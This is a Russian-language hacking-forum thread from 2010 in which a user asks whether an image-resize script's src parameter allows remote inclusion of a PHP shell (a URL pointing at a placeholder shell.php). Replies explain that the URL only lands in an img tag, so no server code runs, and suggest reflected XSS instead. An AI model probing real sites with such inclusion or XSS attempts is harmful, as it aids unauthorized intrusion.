php-including

Discussion in 'Песочница' started by Dread, 3 Aug 2010.

  1. Dread

    Dread Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    28
    Likes Received:
    2
    Reputations:
    0
    не знаю уязвимость ли это и можно ли это как то юзать....
    есть скрипт ресайза и в нём проходит глобальный инклуд, с картинками проходит на ура а вот с остальными форматами не понятно
    http://site.com/lol.php?src=http://somesite.com/image.jpg

    проблема в том что я не пойму исполняется ли такой код
    http://site.com/lol.php?src=http://somesite.com/shell.php

    потому что в ответ получаю вот что

    <body onload='resiz();' style='margin: 0; padding: 0;'>
    <img src='http://site.com/lol.php?src=http://somesite.com/shell.php' width='700' height='700'>
    </body>

    получается что браузер выдаёт мне нерабочую картинку так как ответ возвращается в тЭге <img src='http://site.com/lol.php?src=http://somesite.com/shell.php' width='700' height='700'>

    скорее всего скрипт не фильтрует форматы файлов, так как подгружаются картинки даже таких видов как http://somesite.com/image.php?u=5199&dateline=11989523
     
  2. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    806
    Reputations:
    311
    Эмм... Тоесть на сервер такой скрипт
    PHP:
    <body onload='resiz();' style='margin: 0; padding: 0;'>
    <img src='<?=$url?>' width='700' height='700'>
    </body>
    Так это никакая не уязвимость...
    Хотя XSS может прокатить
     
  3. Dread

    Dread Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    28
    Likes Received:
    2
    Reputations:
    0
    "width='700' height='700'" тоже можно подставлять параметры
    http://site.com/lol.php?src=112222.jpg&w=709&h=696

    то есть выполнение кода не происходит....засада(
     
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Тут инклуда и быть не может. Только если разработчик движка наркоман и к пхп-коду решил подключать картинку =)
    Если в исходнике присутствует текст из запроса, есть вероятность внедрения JS кода, то есть XSS

    upd:
    Смысл пхп-инклуда в том, чтобы внедрить свой код, который выполнится на сервере. Картинки - это всего лишь ссылки в получаемом от сервера html-коде. Браузер скачивает картинки по этим ссылкам и выводит их на страницу.
     
    #4 M_script, 3 Aug 2010
    Last edited: 3 Aug 2010